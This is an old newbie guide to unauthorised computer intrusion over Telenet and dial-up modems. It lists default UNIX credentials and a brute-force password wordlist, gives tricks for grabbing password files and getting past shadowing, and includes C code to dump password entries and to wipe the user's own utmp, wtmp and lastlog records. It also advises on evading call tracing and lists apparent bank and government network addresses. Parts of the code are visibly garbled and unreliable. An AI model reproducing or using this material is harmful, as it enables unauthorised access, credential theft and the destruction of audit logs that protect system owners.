Ultimate step by step guide to the Hacking World..

 

  ********** Welcome to the world of HACKING **********

 

 

special thankx to icekool of hackershideout [http://hackersclub.com/km] for providing the basic article..


Contents:

1.) What should I know about hacking and where can I get started?

2.) What programs will I need?

3.) I got the stuff, what now?

4.) What is Telenet ?

5.) I dialed it out, now what?

6.) How do NUA's work?

7.) Help with NUA's

8.) What should I do once I found a system?

9.) I'm in, now what?

10.) Cracking programs, what they do and how they work.

11.) UNIX.

12.) Password shadowing.

13.) Dialouts

14.) Scanners

15.) Brute force hacking

16.) C-script to erasing your logins

17.) Keeping yourself safe

18.) NUA's that I have found

19.) Conclusion and Hackers Manifesto



Chapter 1.) What should I know about hacking and where can I get started?


Welcome to the world of hacking. You are probably asking why you want to be a hacker
right now. Well, first let me say that if you saw the movie,"Hackers" don't think that that
is hacking. It would be great if they had terminals that automatically put you in a system
and gave out all those cool colors and welcome screens, but it's not that way. In fact,
hacking is like using DOS and C commands. So if you want to be a hacker, realize that.
Don't worry, it's still really cool. But before you start, let's identify things, first off
a terminal. This is what you will use to hack. Click on ,"find" on the start menu of win95/win98.
Then type in ,"Terminal". It will either give you a hyper terminal or a terminal.
Both will work. I prefer the hyper terminal. Choose the regular looking icon that
says,"hyperterm" if you are using the HyperTerminal after you click on its folder.
If you want to use the regular terminal, choose,"terminal". Now you will need to set some
things. In terminal, click on settings. Then click on communications. You will have to
mess with this stuff a little bit because some systems use different paritys and databits, etc.
What I use is as follows:

Baud rate: 19200
parity: odd
databits: 7
flow control:Xon/Xoff

For the hyper terminal, click on the HyperTerminal folder in the find files or folders thing.
Choose hyperterm. Then it will ask you for a name. Call it anything you want. Now it will ask
for a phone #. Don't type a phone number in, look at the bottom. It should say what type of
modem you are using. Click on that and choose the com port that your modem is using. Do the
settings that I listed above and hit ok. Now comes the part where you will need to use certain
commands that work for both programs. It will connect to your modem and then you can tell your
modem what to do. Here are the commands that you can type. By the way, put "AT" before
everything except if you use "a/" or "+++".

at=ok
atdp(phone number)=dials out the number specified using a pulse dial up.
atdt(phone number)=dials out the number specified using a tone dial up.
at e0=echo off(not recommended)
at e1=echo on(recomended,shows what you type in your terminal!very important)
at L0=speacker volume low
at L1=higher speaker volume
at L2=default, medium
at L3=high speaker volume
at a=lets a call be connected to your computer(note! you can wait in your terminal mode and it
will start saying"ring""ring""ring", type that command in and hit enter. It Will connect
whatever is calling you!)


Chapter 2: What programs will I need?

Well, I already mentioned about the terminal. That's your first program you should get.
Now go to either of these two addresses on the web to get your hacking equipment:

www.hackersclub.com/km/files or www.sodaphish.com

The programs that you should get are as follows:

A-dial(or any scanner)- a scanner that will dial every # from 0000-9999 in your local area.

Cracker Jack- One of the best and fastest Crackers out there.
John the Ripper is the best one w/Win95/98

Modem Jammer- makes your calls untraceable!


Chapter 3: I got the stuff, now what?

Study how the stuff works and go to your local library and get some books on the
following systems:

1.) IRIS
2.) UNIX
3.) DEC/10
4.) NOD
5.) VAX

Now get out your cracker and read the instructions on how it works and look at the dictionary
that it comes with (should be "puffs.dic"). Go to the Hackerz Hideout(www.sodaphish.com)
and go to the newbie section and download lesson 1. Read on how it works and play with it
for a while. Now get out your terminal and get ready to dial up your local telenet number!



Chapter 4:What is Telenet ?

Telenet is a network that is used for many purposes. This is where most of your hacking will be
done because hacking directly to an open system is very risky! But if you use telenet and go to an
outdial (more on this later) then the chances are much less risky. So dial up your local telenet number
and get ready to hack!


Chapter 5: I dialed it out, now what?

Here is what you will do. Remember how I told you those modem commands? Here is how
you would dial if you have a pulse phone.

atdp265-8807

For tone:

atdt265-8807

Ok. It should make a modem noise. I'm sure you've heard this before unless you are really
new to computers. Here is a list of commands that you can use in telenet:

C-Connect

D-disconnect

Mail-mail

Telemail-mail

full-network echo (should be really good to use!)

half-terminal echo(I don't recommend it, but try it and see what happens, just type"full"when your done)

Stat-Shows network port

Set-Select pad perimeters

Cont-Continue

Hangup-Hangs up

Access-Telenet Account (Need username and password)


Here is a trick that you can try. Once you have connected, hit enter twice; then it
will tell you you've connected to telenet on a certain address. Now either hit enter once
or type in the type of terminal you are using. It should give you a prompt that looks like
this:

@

Now Type in telemail. It will say that it is connected. Now type in"phones" for the
username and password. It will run down with a list of things. Try everything out that looks
interesting. You can also type in help at the login prompt and it will ask you for an
organization and a password.
A good thing to remember!

Whenever you connect to a system and it will ask you"login" or "ugi" or "user id",
etc... before you get cocky, try typing some things in such as help, teach, learn,help login,
help logon, systat, and some other commands that you can think of by yourself. Just type one
of those in for the login name,or before it asks you to login and see what happens.



Chapter 6: How do NUA's work?

Well, NUA's are like little addresses that you can connect to when you are in telenet.
The way it works is by typing in an area code and then typing in any number after- words.
It would be something like this:
____
@033|798|- the number after-words
-|--------
areacode

That would be the area code of cal. There is also something that you might see in front
of it. It would look like this:

03110 033 0079800

The number in front(03110) is the pad that you are connected to. This is very important
because you cannot always connect to an NUA because it will not always have what is called
reverse charging. Reverse charging is sort of like you dialing someone's number collect. But
I will explain more about this in the Help with NUA's section. You probably noticed that there
were some zeros in the 798 part. A lot of times you will find this in systems. But usually you
can ignore this.

You can also put a "c" in front of the NUA. It would look like this:

@c540 798

Note! Whenever I put a @ in front of a number like I just did, don't type that in, all
you would have to type would be "c540 798". That is just the prompt.


Chapter 7: Help with NUA's

Not to many things have worked with NUA's that I have found. Although you could try
these commands at the login prompt:

1.) help
2.) learn
3.) list
4.) list users
5.) games
6.) List games
7.) help logon
8.) help login
9.) and anything else that comes to your mind. Use common sense.

If you try connecting to an NUA and it says that there
is reverse charging,you can get by this by either connecting to another pad that isn't
long distance to that NUA or you can use what is called an NUI (Network User ID). The NUI is
faster but they are very hard to find. I wouldn't even try it,but if you want to, here is what
you would do. Say that you liked system:

201 432

You would put a coma after the NUA and type the user name and then type in a password.
For example:

201 432,username,password

I would stick to the pads rather than this, it is much easier. Although, there are
plenty of systems that will except reverse charging, so I personally just leave them
alone. There to much trouble.

Another problem with NUA's is that you will try to connect to one and it will just
sit there and stare in your face. You will always know that when this happens that there is
not a system. It will probably always just sit there. If you get stuck like that for to long,
telenet will knock you off. That is very annoying! But I finally found a way to get past this.
All you have to do is hold down the shift key and hit the "2" button and then hit enter. Then
it will bring you back to the "@" prompt. Now hit "d" and hit enter to disconnect. Now you're
all set to try another NUA.

Chapter 8: What should I do once I found a system?

Your first objective is to identify what type of system you have found. There are 2
ways to do this. The first and easiest way is to look for a copy of the LOD (legion of doom)
and it will have most all the info that you will need on identifying systems. The second and
best way to do this is to go to your local library or bookstore and read up on all the systems
you can. Basically,I am saying to get LOD's copy and look at the systems they are talking about
and get books on those systems.

Once you've identified the system, first try the defaults that you have. If your defaults
worked, that's great, move on to the next chapter, if not, do some research in the library
section of the hackers hideout on sniffing and spoof ID.

Chapter 9: I'm in, now what?

Well, I agree with LOD. I can't tell you what to do once you got inside the system. It
is totally all up to you, you are the hacker which means that you are in command. I would
recommend looking in the books that you got on the system that you are in and look at all
of its useful commands. Try everything out, don't be afraid, you can't go any further unless
you try different things out. Search the system to your desire. Have fun!

Chapter 10: Cracking programs

A while back I said something about Cracker Jack. That is the type of Cracker that I will
be referring to. Cracker Jack comes with a dictionary called, "puffs.dic". In the next chapter
you will learn how to obtain passwords in a UNIX system, so this will be very useful. Say you
see some passwords you want to crack. It goes like this, a word is scrambled (encrypted). A
cracker will take this word and look at it with its dictionary. here is a sample:

akcihgn

The dictionary will look at it and look at every word in the English language that has
seven letters and has each of those very letters. A lot of times, you will get lots of possible
words, but one of them is the real password! In this case, it is "hacking".



Chapter11:UNIX

Well, if you finally found your first UNIX, then this is going to be a treat! First of
all, UNIX will greet you with a welcoming message and then will say, "Login". To login, all you
have to do is type in some defaults. Here they are:


login: root pw: root
login: root pw: system
login: root pw: sysop
login: sys pw: sys
login: sys pw: system
login: daemon pw: daemon
login: uucp pw: uucp
login: tty pw: tty
login: test pw: test
login: unix pw: unix
login: unix pw: test
login: bin pw: bin
login: adm pw: adm
login: adm pw: admin
login: admin pw: admin
login: sysman pw: sysman
login: sysman pw: sys
login: sysman pw: system
login: sysadmin pw: sysadmin
login: sysadmin pw: system
login: sysadmin pw: sys
login: sysadmin pw: admin
login: sysadmin pw: adm
login: who pw: who
login: learn pw: learn
login: uuhost pw: uuhost
login: guest pw: guest
login: host pw: host
login: nuucp pw: nuucp
login: rje pw: rje
login: games pw: games
login: games pw: player
login: sysop pw: sysop
login: demo pw: demo

When these defaults don't work, you will have to use brute force hacking which you will
learn later on. What you will do is use the default for your login name, then use the list of
passwords. For example:

login: sysadmin
password:(every password in the list)

If sysadmin didn't work move to the next default and use every password, then to the next
etc. Here is the list of defaults to use:


adm
admin
ann
anon
anonymous/anonymous
backup
batch
bin
checkfsys
daemon
demo
diag
field
ftp
games
guest/guest guest/anonymous
help
install
listen
lp
lpadmin
maint
makefsys
mountfsys
network
news
nobody
nuucp
nuucpa
operator
powerdown
printer
pub
public
reboot
rje
rlogin
root
sa
setup
shutdown
startup
sync
sys/sys
sysadm
sysadmin
sysbin/sysbin sysbin/bin
sysman
system
tech
test
trouble
tty
umountfsys
user/user user1/user1
uucp
uucpa
visitor

Once you are in, save the account to a floppy. To access the password file on UNIX,
type in this command:

etc/passwd

Now download the password file. This can be done by typing "d". If you type in this
command and nothing shows up, try typing in "cat_/etc/passwd". If that doesn't work, then the
UNIX system might not have what is called a shell account. In that case, move on to a new
system. Ok, If you got the passwd file downloaded, take it to your cracker and crack it. If you
have trouble cracking it, make sure that you typed in the right dictionary (puffs.dic) and the
file of the passwd. Now look at one of the accounts, it will probably have a list of words that
could be the password. Try every word that it gives you, one of the words will definitely work!
Now finally log on as that user and change his password. Well, you've done it! You own the
account. If you want to go a little further, look for the password on the "sysadmin and root".
You would login like this:

login:root
password:(password)

login:sysadmin
password:(password)

I hope that that helps you out. Remember, if you logon as the superuser (root), you have
total command over the whole system. So act normal and if anyone tries to talk to you, act like
you would if you were the sysop (system administrator), and NEVER manipulate files!

NOTE! This is what a passwd file will look like when you get it:

John:234abc56:9999:13:John_Johnson:/home/dir/John:/bin/John.

Here is what it is broken down:

Username: John
Encrypted password: 234abc56
User # 9999
Group# 13
Other information: John Johnson
Home directory: /home/dir/John
Shell:/bin/John

Chapter12: Password Shadowing

Unfortunately, today most all UNIX systems have what is called password shadowing. It is
a type of security that the admins use to keep hackers out. The password is still encrypted but
you can't see the encrypted passwords. Here are Three ways that I have heard of to get around
this. The first one is simple, you find the shadowed passwords in a different directory. I will
name the system, you type in what is on the right. That will enable you (hopefully to find the
encrypted passwords)but first, here is how you can identify a shadowed password. Look at this
list and notice how there is either a * or an X in the passwords place:

root:*:0:3:::
ftp:*:500:19:::
aolbeta:*:295:20:::
macbeta:*:297:20:::
atropos:*:228:20:::

In this case the * was in place for the encrypted password. Here is a sample of the other
type I have seen:

Cougar:X:5:9987:/home/dir/bin

Now to defeat this here is the first way:


UNIX Path Token
-----------------------------------------------------------
AIX 3 /etc/security/passwd !
or /tcb/auth/files//
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow X
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow X
Linux1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files//
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow

System V Release 4.0 /etc/shadow X
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *


Here is the second way. This is more confusing because you need to understand what a
loop is. I got this out of the Library section of the HackerZ Hideout. So you can look in there
too if you want :)

This trick will only work with certain systems. Notice how the loop works. It is very
important to the hacker. If you can find anything on loops, read it! It is great knowledge to
have,but even I have trouble understanding it. Once you are in a Unix system, and of course,
the passwd file is shadowed, try typing in "ypcat /etc/passwd >~/passwd"instead of"etc/passwd".
Now download the passwd file from your home dir. Here is the trick, type in:

rm -f ~/.lastlogin

ln -s ~/.lastlogin /etc/passwd

Now logout and then back in so that you create a link.

cat .lastlogin > passwd
rm -f ~/.lastlogin


That way is a little tricky, but read up on loops and maybe it will work out for you.
Here is the third and final trick. It is probably the best way because supposedly, it works
with everything. What you will do is write a C-script. For those of you who don't know what a
C-script is, it is a program that you write out in the C language Such as C++. You can get C++
at the store or ask around to warez pups. They should have it. What you will do is write it out.
Then what you will have to do is go and compile it. It shouldn't be to hard. Anyway, here is
the script:



struct SHADOWPW { /* see getpwent(3) */
char *pw_name;
char *pw_passwd;
int pw_uid;
int pw_gid;
int pw_quota;
char *pw_comment;
char *pw_gecos;
char *pw_dir;
char *pw_shell;
};
struct passwd *getpwent(), *getpwuid(), *getpwnam();

#ifdef elxsis?

/* Name of the shadow password file. Contains password and aging info*

#define SHADOW "/etc/shadowpw"
#define SHADOWPW_PAG "/etc/shadowpw.pag"
#define SHADOWPW_DIR "/etc/shadowpw.dir"
/*
* Shadow password file pwd->pw_gecos field contains:
*
* <type>,<period>,<last_time>,<old_time>,<old_password>
*
* <type> = Type of password criteria to enforce (type int).
* BSD_CRIT (0), normal BSD.
* STR_CRIT (1), strong passwords.
* <period> = Password aging period (type long).
* 0, no aging.
* else, number of seconds in aging period.
* <last_time> = Time (seconds from epoch) of the last password
* change (type long).
* 0, never changed.n
* <old_time> =Time (seconds from ephoch) That the current password
* Was made the <old_password> (type long).
* 0, never changed.ewromsinm
* <old_password> = Password (encrypted) saved for an aging <period> t
* prevent reuse during that period (type char [20]).
* "*******", no <old_password>.
*/

/* number o tries to change an aged password */

#deffine CHANGE_TRIES 3

/* program to execute to change passwords */

#define PASSWD_PROG "/bin/passwd"

/* Name of the password aging exempt user names and max number of entir

#define EXEMPTPW "/etc/exemptpw"
#define MAX_EXEMPT 100


/* Password criteria to enforce */

#define BSD_CRIT 0 /* Normal BSD password criteria */
#define STR_CRIT 1 /* Strong password criteria */
#define MAX_CRIT 1
#endif elxsi
#define NULL 0
main()
{
struct passwd *p;
int i;
for (;1;) {;
p=getpwent();
if (p==NULL) return;
printpw(p);
}

}

printpw(a)
struct SHADOWPW *a;
{
printf("%s:%s:%d:%d:%s:%s:%s\n",
a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid,
a->pw_gecos,a->pw_dir,a->pw_shell);
}

/* SunOS 5.0 /etc/shadow */
/* SunOS4.1+c2 /etc/security/passwd.adjunct */


Chapter13: Dial outs

A NUA can sometimes connect you to what is called an outdial. An outdial is a modem that
you can get to through the NUA. A good use for this is to use a scanner and dial every # from
0000-9999 on a 3-digit prefix in your area for a list of computers you can hack into. You can
also hack them through this outdail. More on scanning later. Another great use for outdials is
to dial up long-distance BBS #'s or other telenet #'s or any # of things you can think of! Also
it is much harder and more expensive to trace a call if you are using an outdial. It will be
traced to the system.

A thing that you should do before you even attempt to dial out a number is the redial
command. This is because it will dial out the number that was dialed just before and is an
excellent way to find new systems to hack:). Also, on a ventel modem, type "d" and it will list
5 modem numbers in its memory that you can connect to! So I guess right now you're saying,
"Well, how do I find one of these outdials?"Well, you will need to find a system called a,
"Decserver". What I would recommend is to get a list of NUA's from somebody or a magazine such
as phrack#21, or 2600. They should have a list of them in there.

Chapter 14: Scanners

A scanner is a program that will dial every # in a 3-digit prefix from 0000-9999. For
example:

My telephone number is 898-3788 (not right) so if I thought my school was in the 898 area, I
would put in "898" for the 3-digit prefix and set it to dial every number from 0000-9999. Using
898 in the front o each number, I am certain to find the number that my school modem is at and
every other modem that will connect me to a system. Just make sure that you either dial *67 if
it asks you for a certain code thing so that your calls cannot be traced or just use an outdial.

Note! A good thing to do whenever you hack is to either use a converter or a modem jammer.
This will also prevent your calls from being traced :)

Chapter 15: Brute force hacking

Brute force hacking is a method made for systems that don't keep track of you trying to
login such as UNIX. You will notice that on some UNIX boxes that the default will not
work. It can be very frustrating! This method approaches the system by typing the default in
where it ask you to login and use this whole list of words for passwords. You have to do it
over and over again. It will take a long time, but every hacker must be patient. An example
of what I am saying is doing something like this:

login: sysadmin
password: aaa
login incorrect
login: sysadmin
password: academia etc.

I am not sure how you would make a program that can make brute force hacking a lot easier,
but I am sure that there is a way and if you look around on the web a little bit, I am sure
that you would be able to find the C-script. So just search around a little bit.

As you see, it takes a lot of work. You will have to do this for each default, so just
be patient. Most of these passwords come from LOD. I put a few in there but not nearly as many
as them.

------------------------------------------------------------
Brute force hacking
------------------------------------------------------------

aaa
academia
ada
adrian
aerobics
daniel
danny
dave
deb
debbie
jester
johnny
joseph
joshua
judith
rascal
really
rebecca
remote
rick
airplane
albany
albatross
albert
alex
alexander
algebra
alias
alpha
alphabet
ama
amy
analog
anchor
andy
andrea
animal
answer
anything
arrow
arthur
asshole
athena
atmosphere
attention
aligator
alpine
altitude
billy
bacchus
badass
bailey
anana
bandit
banks
bass
batman
beauty
beaver
beethoven
beloved
benz
beowulf
berkeley
berlin
beta
beverly
bob
brenda
brian
bridget
broadway
bumbling
bubbles
buger
belt
bitch
basturd
bee
butt
bust
bib
cardinal
carmen
carolina
caroline
castle
cat
celtics
change
charles
charming
charon
chester
celebrate
cattle
cadabra
chilly
chelsey
cucumber
deborah
december
desperate
develop
diet
digital
discovery
disney
dog
drought
duncan
dudu
dust
dimple
dip
doodle
dildo
dic
disaster
damn
dig
dug
easy
eatme
edges
edwin
egghead
eileen
einstein
elephant
elizabeth
ellen
emerald
engine
engineer
enterprise
enzyme
euclid
evelyn
extension
fairway
felicia
fender
fermat
finite
flower
foolproof
football
format
forsythe
fourier
fred
friend
frighten
fun
fagot
fumble
fabulous
fix
fiddle
finger
gabriel
garfield
gauss
george
gertrude
gibson
ginger
gnu
gol
golffer
gorgeous
graham
gryphon
guest
guitar
gilbert
hacker
hug
halarius
hell
heep
hip
hop
hope
humble
hill
head
hello
heck
huddle
ireland
juggle
julia
kathleen
kermit
kernel
knight
kathy
lambda
larry
lazarus
lee
leroy
lewis
light
lisa
louis
lynne
list
limp
mac
macintosh
mack
maggot
magic
malcolm
mark
marck
marc
markus
marty
marvin
master
maurice
merlin
mets
michael
ichelle
mike
minimum
minsky
mogul
moose
mozart
nancy
napoleon
network
newton
next
olivia
oracle
orca
orwell
osiris
outlaw
oxford
paciic
painless
pam
paper
password
pat
patricia
penguin
pete
peter
reagan
robot
robotics
rolex
ronald
rosebud
rosemary
roses
ruben
rules
ruth
sal
saxon
scheme
scott
scotty
secret
sensor
serenity
sex
shark
sharon
shit
shiva
shuttle
simon
simple
singer
single
smile
smiles
smooch
smother
snatch
snoopy
soap
socrates
spit
spring
subway
success
summer
super
support
surfer
suzanne
tangerine
tape
target
taylor
telephone
thomas
temptation
tiger
toggle
tomato
toyota
trivial
theresa
unhappy
unicorn
unknown
cigar
classic
cofee
harmony
harold
harvey
philip
phoenix
pierre
urchin
utility
vicky
coke
collins
comrade
computer
condo
condom
cookie
cooper
create
creation
creator
cretin
daemon
dancer
heinlein
hello
help
herbert
honey
horse
imperial
include
ingres
innocuous
irishman
isis
japan
jessica
pizza
plover
polynomial
praise
prelude
prince
protect
pumpkin
puppet
rabbit
rachmaninoff
rainbow
raindrop
random
virinia
virgin
warren
water
weenie
whatnot
whitney
will
william
willie
winston
wizard
wombat
yosemite
zap
------------------------------------------------------------

Well, like I said, I added a couple words in there, maybe 20 or so, but most of these
come from LOD. In my next book, I will keep every UNIX password I get and have my own password
list.

Chapter 16: C-script for erasing your logins

Well, if you want to really be secure, this is one of the best ways! There might be some
ways that you could think of typing in to erase it but it won't work. Only a program can erase
your logins. Aren't programs great:) I already told you what a C-script is so just copy this or
type it in in your C program and then compile it.

------------------------------------------------------------

#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,_RDWR))>=0) {
while(read (f, &utmp_ent,
sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));

}
close(f);
}
}

void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;

pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) *pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >=0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
close(f);
}

} else printf("%s: ?/n",who);
}

mai(argc,argv)
int argc;
char *argv[];
{
if (argc--2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!/n");
} else
printf("Error./n");
}
------------------------------------------------------------

Well, that is an excellent way to keep yourself safe. I would highly recomend it!


Chapter 17: Keeping yourself safe

Well, the things that you will mostly need are up at the front in the list that I gave
you of stuff that you will need. What I would recommend is to:

1.) encrypt your hard drive
2.) use a modem jammer before you even get onto telenet
3.) first find yourself an outdial, then dial up another number that you are interested in
hacking or dial up into another telenet number and connect onto there and hack some NUA's from
there.
4.) Don't brag to anyone! about you hacking any systems.
5.) Never Hack Government systems unless you know what the hell your doing and plan on moving.
6.) Never hack unless u got pretty knowledge about it..

If you pretty much do that, I would say that you should be safe.

Chapter 18: NUA's that I have found

Unfortunately Almost all of the NUA's that I have found are government systems. There are
a few that seem like they might be pretty cool, but make sure that you know what you are doing!


NUA TIPS

201 156 A UNIX system! excelent to start out
with but the problem is that it is
for more experienced UNIX hackers.

90155 ?

2241 It will say"DTE". Seems to be a bank
up in main.

22417 Government system, leave it alone!

22425 ?

2236 Gives you a "<"prompt. tell it
anything, when you go to login,
it will ask for a transaction ID.

3215 NASA, LEAVE IT ALONE!!!!!!!!

22430 Bank in Athens Greece. Looks very
interesting!

201170 asks you to enter a command

201179 asks you for an application

201200 Not sure, wouldn't take a chance

201201 same as 201200

202255 type "help" then choose your terminal
type. I wouldn't take any chances
though, looks a little tight on
security.



This book was intended for newbies. I am stuck between being an intelligent hacker and
newbie, but as soon as I get some books on some newer systems and learn how they work, I will
be putting in all the defaults and helpful commands. It wont have as much newbie material, it
will be for more experienced hackers. I hope this file has helped you with all of your hacking
needs. When I was a newbie there wasn't to many things to look at, it was all trial and error.
It still will be for you, but you have a better idea of what hacking is like. All I recommend
for you to do now is to read more books.





Special Credits to :
1. Icekool
2. LOD
3. The Mentor

 

Hackersclub